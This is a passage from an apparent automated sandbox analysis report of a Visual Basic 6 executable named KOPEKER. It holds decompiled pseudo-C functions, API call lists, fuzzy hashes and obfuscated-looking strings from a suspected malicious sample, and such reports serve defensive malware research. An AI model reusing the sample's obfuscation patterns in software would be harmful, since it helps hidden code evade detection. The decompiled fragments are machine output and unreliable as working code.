          				_t101 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
          				asm("fclex");
          				_v72 = _t101;
          				if(_v72 >= 0) {
          					_v100 = _v100 & 0x00000000;
          				} else {
          					_push(0xe0);
          					_push(0x411c4c);
          					_push(_v68);
          					_push(_v72);
          					L00401906();
          					_v100 = _t101;
          				}
          				_t102 = _v36;
          				_v84 = _t102;
          				_v36 = _v36 & 0x00000000;
          				L00401882();
          				L004018AC();
          				_push(1);
          				_push(0x411f60);
          				L00401786();
          				L00401882();
          				_push(_t102);
          				_push(0x411cf4);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v60 =  ~( ~( ~_t102));
          				L00401924();
          				_t106 = _v60;
          				if(_t106 != 0) {
          					if( *0x4183d8 != 0) {
          						_v104 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v104 = 0x4183d8;
          					}
          					_v60 =  *_v104;
          					_t112 =  *((intOrPtr*)( *_v60 + 0x1c))(_v60,  &_v40);
          					asm("fclex");
          					_v64 = _t112;
          					if(_v64 >= 0) {
          						_v108 = _v108 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v60);
          						_push(_v64);
          						L00401906();
          						_v108 = _t112;
          					}
          					_v68 = _v40;
          					_v48 = 0x80020004;
          					_v56 = 0xa;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t118 =  *((intOrPtr*)( *_v68 + 0x5c))(_v68, 0x10,  &_v36);
          					asm("fclex");
          					_v72 = _t118;
          					if(_v72 >= 0) {
          						_v112 = _v112 & 0x00000000;
          					} else {
          						_push(0x5c);
          						_push(0x411c24);
          						_push(_v68);
          						_push(_v72);
          						L00401906();
          						_v112 = _t118;
          					}
          					_t106 = _v36;
          					_v88 = _t106;
          					_v36 = _v36 & 0x00000000;
          					L00401882();
          					L004018AC();
          				}
          				_push(0x417735);
          				L00401924();
          				L00401924();
          				return _t106;
          			}


































          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00417508
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 0041753F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00417583
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175C4
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175E2
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175EA
          • #616.MSVBVM60(00411F60,00000001), ref: 004175F6
          • __vbaStrMove.MSVBVM60(00411F60,00000001), ref: 00417600
          • __vbaStrCmp.MSVBVM60(00411CF4,00000000,00411F60,00000001), ref: 0041760B
          • __vbaFreeStr.MSVBVM60(00411CF4,00000000,00411F60,00000001), ref: 0041761F
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411CF4,00000000,00411F60,00000001), ref: 00417643
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 00417687
          • __vbaChkstk.MSVBVM60(00000000), ref: 004176B0
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 004176E1
          • __vbaStrMove.MSVBVM60(00000000,?,00411C24,0000005C), ref: 004176FF
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 00417707
          • __vbaFreeStr.MSVBVM60(00417735,00411CF4,00000000,00411F60,00000001), ref: 00417727
          • __vbaFreeStr.MSVBVM60(00417735,00411CF4,00000000,00411F60,00000001), ref: 0041772F
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$Move$ChkstkNew2$#616
          • String ID:
          • API String ID: 5717343-0
          • Opcode ID: 55827eb7862dedb62ec7faf39c9a2e8607f41220bed7a7c88dd8d53cb0e3d13f
          • Instruction ID: 70208903a64aba6f0e4c8a5e0a2c1357743851c8bd275878065304b184508531
          • Opcode Fuzzy Hash: 55827eb7862dedb62ec7faf39c9a2e8607f41220bed7a7c88dd8d53cb0e3d13f
          • Instruction Fuzzy Hash: 9C71E271D40208EFCF00EF95C985BDEBBB1AF08745F20442AF505BB2A1DBB96985DB58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 34%
          			E00415A39(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				char _v24;
          				void* _v28;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				intOrPtr _v40;
          				signed int _v44;
          				void* _v48;
          				signed int _v52;
          				intOrPtr _v60;
          				intOrPtr _v68;
          				char* _v76;
          				char _v84;
          				intOrPtr* _v104;
          				signed int _v108;
          				intOrPtr* _v112;
          				signed int _v116;
          				signed int _v124;
          				signed int _v128;
          				intOrPtr* _v132;
          				signed int _v136;
          				signed int _v140;
          				intOrPtr* _v144;
          				signed int _v148;
          				char* _t78;
          				char* _t79;
          				signed int _t85;
          				signed int _t92;
          				signed int _t98;
          				intOrPtr _t118;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t118;
          				L004016F0();
          				_v12 = _t118;
          				_v8 = 0x401570;
          				_push(0x411d1c);
          				L004017F2();
          				if(0x80 != 2) {
          					if( *0x4183d8 != 0) {
          						_v132 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v132 = 0x4183d8;
          					}
          					_v104 =  *_v132;
          					_t92 =  *((intOrPtr*)( *_v104 + 0x1c))(_v104,  &_v48);
          					asm("fclex");
          					_v108 = _t92;
          					if(_v108 >= 0) {
          						_v136 = _v136 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v104);
          						_push(_v108);
          						L00401906();
          						_v136 = _t92;
          					}
          					_v112 = _v48;
          					_v76 = 0x80020004;
          					_v84 = 0xa;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t98 =  *((intOrPtr*)( *_v112 + 0x54))(_v112, 0x10,  &_v52);
          					asm("fclex");
          					_v116 = _t98;
          					if(_v116 >= 0) {
          						_v140 = _v140 & 0x00000000;
          					} else {
          						_push(0x54);
          						_push(0x411c24);
          						_push(_v112);
          						_push(_v116);
          						L00401906();
          						_v140 = _t98;
          					}
          					_v124 = _v52;
          					_v52 = _v52 & 0x00000000;
          					_v60 = _v124;
          					_v68 = 9;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v40);
          					L0040191E();
          					L004018AC();
          					L00401912();
          				}
          				_v76 =  &_v24;
          				_v84 = 0x6003;
          				_t78 =  &_v84;
          				_push(_t78);
          				L0040185E();
          				if(_t78 != 0xffff) {
          					if( *0x4183d8 != 0) {
          						_v144 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v144 = 0x4183d8;
          					}
          					_v104 =  *_v144;
          					_t85 =  *((intOrPtr*)( *_v104 + 0x48))(_v104, 0x43,  &_v44);
          					asm("fclex");
          					_v108 = _t85;
          					if(_v108 >= 0) {
          						_v148 = _v148 & 0x00000000;
          					} else {
          						_push(0x48);
          						_push(0x411ad0);
          						_push(_v104);
          						_push(_v108);
          						L00401906();
          						_v148 = _t85;
          					}
          					_v128 = _v44;
          					_v44 = _v44 & 0x00000000;
          					L00401882();
          				}
          				_v36 = 0x76e8d350;
          				_v32 = 0x5af4;
          				_push(0x415c87);
          				_t79 =  &_v24;
          				_push(_t79);
          				_push(0);
          				L00401858();
          				L00401924();
          				L004018AC();
          				return _t79;
          			}



































          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415A56
          • __vbaLenBstrB.MSVBVM60(00411D1C,?,?,?,?,004016F6), ref: 00415A6D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411D1C,?,?,?,?,004016F6), ref: 00415A8E
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 00415AD2
          • __vbaChkstk.MSVBVM60(?), ref: 00415B01
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000054), ref: 00415B32
          • __vbaChkstk.MSVBVM60(00000000,?,00411C24,00000054), ref: 00415B60
          • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00415B73
          • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00415B7B
          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00415B83
          • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411D1C), ref: 00415B99
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411D1C), ref: 00415BBB
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000048), ref: 00415C0A
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00006003), ref: 00415C2E
          • __vbaAryDestruct.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C71
          • __vbaFreeStr.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C79
          • __vbaFreeObj.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C81
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckChkstkHresult$New2$#556BstrDestructLateMove
          • String ID:
          • API String ID: 3585757769-0
          • Opcode ID: 3056ca797921c6cd124661e1fff0585c4cb268c6ffb10ac798b83e84e639ebab
          • Instruction ID: 5e9754389d3d2dc98908c1484a38d1c68dae30681688a402599ce784e523a8cd
          • Opcode Fuzzy Hash: 3056ca797921c6cd124661e1fff0585c4cb268c6ffb10ac798b83e84e639ebab
          • Instruction Fuzzy Hash: 8D611471940718DFDB10EF94C886BDEBBB4BF08704F20442AE505BB2A1D7B96985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 56%
          			E00416535(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				short _v24;
          				long long _v32;
          				void* _v36;
          				char _v52;
          				char _v68;
          				char* _v92;
          				intOrPtr _v100;
          				intOrPtr _v108;
          				char _v116;
          				void* _v120;
          				signed int _v124;
          				signed int _v128;
          				intOrPtr* _v132;
          				signed int _v136;
          				signed long long _v144;
          				signed int _v148;
          				intOrPtr* _v152;
          				signed int _v156;
          				signed int _v160;
          				signed int _t66;
          				signed int _t69;
          				signed int _t75;
          				signed int _t80;
          				short _t81;
          				signed int _t84;
          				char* _t87;
          				intOrPtr _t94;
          				intOrPtr* _t95;
          				signed long long _t105;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t94;
          				L004016F0();
          				_v12 = _t94;
          				_v8 = 0x401630;
          				_v92 = L"01/01/01";
          				_v100 = 8;
          				_t87 =  &_v52;
          				L004018A0();
          				_push( &_v52);
          				_push( &_v68);
          				L004017C2();
          				_v108 = 0x7d1;
          				_v116 = 0x8002;
          				_push( &_v68);
          				_t66 =  &_v116;
          				_push(_t66);
          				L00401828();
          				_v124 = _t66;
          				_push( &_v68);
          				_push( &_v52);
          				_push(2);
          				L00401942();
          				_t95 = _t94 + 0xc;
          				_t69 = _v124;
          				if(_t69 != 0) {
          					_push(_t87);
          					_v52 =  *0x401628;
          					_t105 =  *0x401620 *  *0x401618;
          					if( *0x418000 != 0) {
          						_push( *0x401614);
          						_push( *0x401610);
          						L00401714();
          					} else {
          						_t105 = _t105 /  *0x401610;
          					}
          					_v144 = _t105;
          					 *_t95 = _v144;
          					_v68 =  *0x401608;
          					L0040183A();
          					 *_t95 =  *0x4015f8;
          					 *_t95 =  *0x4015f4;
          					 *_t95 =  *0x4015f0;
          					_t84 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t87, _t87, _t87, _t69, _t87, _t87);
          					asm("fclex");
          					_v124 = _t84;
          					if(_v124 >= 0) {
          						_v148 = _v148 & 0x00000000;
          					} else {
          						_push(0x2c0);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v124);
          						L00401906();
          						_v148 = _t84;
          					}
          				}
          				if( *0x4183d8 != 0) {
          					_v152 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v152 = 0x4183d8;
          				}
          				_v124 =  *_v152;
          				_t75 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v36);
          				asm("fclex");
          				_v128 = _t75;
          				if(_v128 >= 0) {
          					_v156 = _v156 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v124);
          					_push(_v128);
          					L00401906();
          					_v156 = _t75;
          				}
          				_v132 = _v36;
          				_t80 =  *((intOrPtr*)( *_v132 + 0x108))(_v132,  &_v120);
          				asm("fclex");
          				_v136 = _t80;
          				if(_v136 >= 0) {
          					_v160 = _v160 & 0x00000000;
          				} else {
          					_push(0x108);
          					_push(0x411c4c);
          					_push(_v132);
          					_push(_v136);
          					L00401906();
          					_v160 = _t80;
          				}
          				_t81 = _v120;
          				_v24 = _t81;
          				L004018AC();
          				_v32 =  *0x4015e8;
          				asm("wait");
          				_push(0x41678a);
          				return _t81;
          			}



































          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416552
          • __vbaVarDup.MSVBVM60 ref: 00416578
          • #553.MSVBVM60(?,?), ref: 00416585
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004165A0
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004165B3
          • _adj_fdiv_m64.MSVBVM60 ref: 004165FA
          • __vbaFpI4.MSVBVM60 ref: 0041661F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000002C0), ref: 00416671
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00416698
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 004166E5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000108), ref: 00416735
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,00000108), ref: 00416754
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$#553ChkstkListNew2_adj_fdiv_m64
          • String ID: 01/01/01
          • API String ID: 2139296166-1279165767
          • Opcode ID: 055a181fd9c3a42d23bf47e62cae28a67159e67bd391382cdf578f86af3ced49
          • Instruction ID: fc788b5fc76ec4c661babd42eed99f46b999cce5e48750d7f78bd91adb4cebaf
          • Opcode Fuzzy Hash: 055a181fd9c3a42d23bf47e62cae28a67159e67bd391382cdf578f86af3ced49
          • Instruction Fuzzy Hash: 8E515671900218EFDB10AFA0CD49BEDBBB8FB08704F1544AEE149B71A1DB789994DF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 62%
          			E00416A3A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				void* _v28;
          				void* _v32;
          				signed int _v36;
          				void* _v40;
          				char _v56;
          				intOrPtr* _v60;
          				signed int _v64;
          				intOrPtr* _v68;
          				signed int _v72;
          				intOrPtr _v84;
          				intOrPtr* _v88;
          				signed int _v92;
          				signed int _v96;
          				signed int _t60;
          				signed int _t65;
          				signed int _t66;
          				void* _t78;
          				void* _t80;
          				intOrPtr _t81;
          
          				_t81 = _t80 - 0xc;
          				 *[fs:0x0] = _t81;
          				L004016F0();
          				_v16 = _t81;
          				_v12 = 0x401650;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x4016f6, _t78);
          				_push(L"7:7:7");
          				_push( &_v56);
          				L004017AA();
          				_push( &_v56);
          				L004017B0();
          				L00401882();
          				L00401912();
          				if( *0x4183d8 != 0) {
          					_v88 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v88 = 0x4183d8;
          				}
          				_v60 =  *_v88;
          				_t60 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
          				asm("fclex");
          				_v64 = _t60;
          				if(_v64 >= 0) {
          					_v92 = _v92 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v60);
          					_push(_v64);
          					L00401906();
          					_v92 = _t60;
          				}
          				_v68 = _v40;
          				_t65 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
          				asm("fclex");
          				_v72 = _t65;
          				if(_v72 >= 0) {
          					_v96 = _v96 & 0x00000000;
          				} else {
          					_push(0xe0);
          					_push(0x411c4c);
          					_push(_v68);
          					_push(_v72);
          					L00401906();
          					_v96 = _t65;
          				}
          				_t66 = _v36;
          				_v84 = _t66;
          				_v36 = _v36 & 0x00000000;
          				L00401882();
          				L004018AC();
          				_push(0x416b97);
          				L00401924();
          				L00401924();
          				return _t66;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416A56
          • #541.MSVBVM60(?,7:7:7,?,?,?,?,004016F6), ref: 00416A83
          • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A8C
          • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A96
          • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A9E
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,7:7:7,?,?,?,?,004016F6), ref: 00416AB6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416AFA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B3B
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B59
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B61
          • __vbaFreeStr.MSVBVM60(00416B97), ref: 00416B89
          • __vbaFreeStr.MSVBVM60(00416B97), ref: 00416B91
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$Move$CheckHresult$#541ChkstkNew2
          • String ID: 7:7:7
          • API String ID: 1992979026-4135912237
          • Opcode ID: de7484df4ffaf3c97750baf78ebbeabad215d5bfff89cf94ef3b3f766c8b1ceb
          • Instruction ID: c9c00dc992880a9df7eb38a18d511c7b4809bacdae20094763e1fe184efa5f6f
          • Opcode Fuzzy Hash: de7484df4ffaf3c97750baf78ebbeabad215d5bfff89cf94ef3b3f766c8b1ceb
          • Instruction Fuzzy Hash: DA41E571D40218AFCB00EFD5C945BDEBBB4AF04744F20842AF505B72A1DB79AA85DB58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 50%
          			E00415CA8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				char _v36;
          				char* _v44;
          				intOrPtr _v52;
          				intOrPtr _v76;
          				intOrPtr _v84;
          				short _v104;
          				char _v108;
          				short _v112;
          				short _t30;
          				short _t36;
          				void* _t47;
          				void* _t49;
          				intOrPtr _t50;
          
          				_t50 = _t49 - 0xc;
          				 *[fs:0x0] = _t50;
          				L004016F0();
          				_v16 = _t50;
          				_v12 = 0x401588;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x4016f6, _t47);
          				L004017EC();
          				_v108 = 0x98e72e79;
          				_push( &_v108);
          				_push(L"Bride6");
          				_t30 =  &_v36;
          				_push(_t30);
          				L004018D6();
          				_push(_t30);
          				E0041165C();
          				_v104 = _t30;
          				L004018D0();
          				asm("sbb eax, eax");
          				_v112 =  ~( ~(_v104 - 0x3b15e5) + 1);
          				L00401924();
          				_t36 = _v112;
          				if(_t36 != 0) {
          					_v44 = L"Spndingsfelts7";
          					_v52 = 8;
          					_v76 = 0x98e72e79;
          					_v84 = 3;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t36 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(2);
          					_push(L"IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72");
          					_push(_v32);
          					L004018FA();
          				}
          				_v28 =  *0x401580;
          				asm("wait");
          				_push(0x415dac);
          				L004018AC();
          				return _t36;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415CC4
          • #598.MSVBVM60(?,?,?,?,004016F6), ref: 00415CE8
          • __vbaStrToAnsi.MSVBVM60(?,Bride6,98E72E79), ref: 00415D01
          • __vbaSetSystemError.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D10
          • __vbaFreeStr.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D2C
          • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D58
          • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D69
          • __vbaLateMemCall.MSVBVM60(?,IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72,00000002,00000000,?,Bride6,98E72E79), ref: 00415D81
          • __vbaFreeObj.MSVBVM60(00415DAC,00000000,?,Bride6,98E72E79), ref: 00415DA6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Chkstk$Free$#598AnsiCallErrorLateSystem
          • String ID: Bride6$IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72$Spndingsfelts7
          • API String ID: 3513344361-1204764921
          • Opcode ID: 9ba6eea4e6b2834c71ed4180316dee29934da15a35bf6c83fd68888bee7f1252
          • Instruction ID: 37e1e018f3d670cf2255f87ce6307905a9e0e99f1db659018bbe8b416997140d
          • Opcode Fuzzy Hash: 9ba6eea4e6b2834c71ed4180316dee29934da15a35bf6c83fd68888bee7f1252
          • Instruction Fuzzy Hash: C3218D71C40308ABCB00EFA5DC46BDEBBB9AF05704F50842AF804BB1A1D7B99545CB48
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 53%
          			E00416246(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				void* _v24;
          				void* _v28;
          				signed int _v32;
          				void* _v36;
          				signed int _v40;
          				signed int _v44;
          				intOrPtr* _v48;
          				signed int _v52;
          				signed int _v60;
          				intOrPtr* _v64;
          				signed int _v68;
          				signed int _v72;
          				signed int _v76;
          				signed int _t59;
          				signed int _t64;
          				signed int _t65;
          				intOrPtr _t81;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t81;
          				_push(0x38);
          				L004016F0();
          				_v12 = _t81;
          				_v8 = 0x4015c8;
          				L004018F4();
          				if( *0x4183d8 != 0) {
          					_v64 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v64 = 0x4183d8;
          				}
          				_v40 =  *_v64;
          				_t59 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
          				asm("fclex");
          				_v44 = _t59;
          				if(_v44 >= 0) {
          					_v68 = _v68 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v40);
          					_push(_v44);
          					L00401906();
          					_v68 = _t59;
          				}
          				_v48 = _v36;
          				_t64 =  *((intOrPtr*)( *_v48 + 0xd8))(_v48,  &_v32);
          				asm("fclex");
          				_v52 = _t64;
          				if(_v52 >= 0) {
          					_v72 = _v72 & 0x00000000;
          				} else {
          					_push(0xd8);
          					_push(0x411c4c);
          					_push(_v48);
          					_push(_v52);
          					L00401906();
          					_v72 = _t64;
          				}
          				_t65 = _v32;
          				_v60 = _t65;
          				_t35 =  &_v32;
          				 *_t35 = _v32 & 0x00000000;
          				L00401882();
          				L004018AC();
          				L004017C8();
          				L0040193C();
          				asm("fcomp qword [0x401548]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if( *_t35 != 0) {
          					L0040183A();
          					_t65 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t65);
          					asm("fclex");
          					_v40 = _t65;
          					if(_v40 >= 0) {
          						_v76 = _v76 & 0x00000000;
          					} else {
          						_push(0x64);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v40);
          						L00401906();
          						_v76 = _t65;
          					}
          				}
          				asm("wait");
          				_push(0x4163c3);
          				L00401924();
          				L00401924();
          				return _t65;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416261
          • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00416279
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416291
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 004162D5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000D8), ref: 00416316
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416334
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041633C
          • __vbaFPInt.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416347
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041634C
          • __vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416362
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000064), ref: 0041638B
          • __vbaFreeStr.MSVBVM60(004163C3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163B5
          • __vbaFreeStr.MSVBVM60(004163C3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163BD
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$ChkstkCopyMoveNew2
          • String ID:
          • API String ID: 1785689987-0
          • Opcode ID: 2fc8871b209d589d8366b269a288114d3180436723d24f16c0d5e0c04949552e
          • Instruction ID: b236f01e2bd691bf364bd193a634995bbb0f4ceea69fe1c2efd4085c16b25e2e
          • Opcode Fuzzy Hash: 2fc8871b209d589d8366b269a288114d3180436723d24f16c0d5e0c04949552e
          • Instruction Fuzzy Hash: A141E27190020DEFCB00EF95C945BDEBBB4FF08745F10806AF415B62A0DB79A985DB68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 52%
          			E004154CB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v24;
          				intOrPtr _v28;
          				void* _v32;
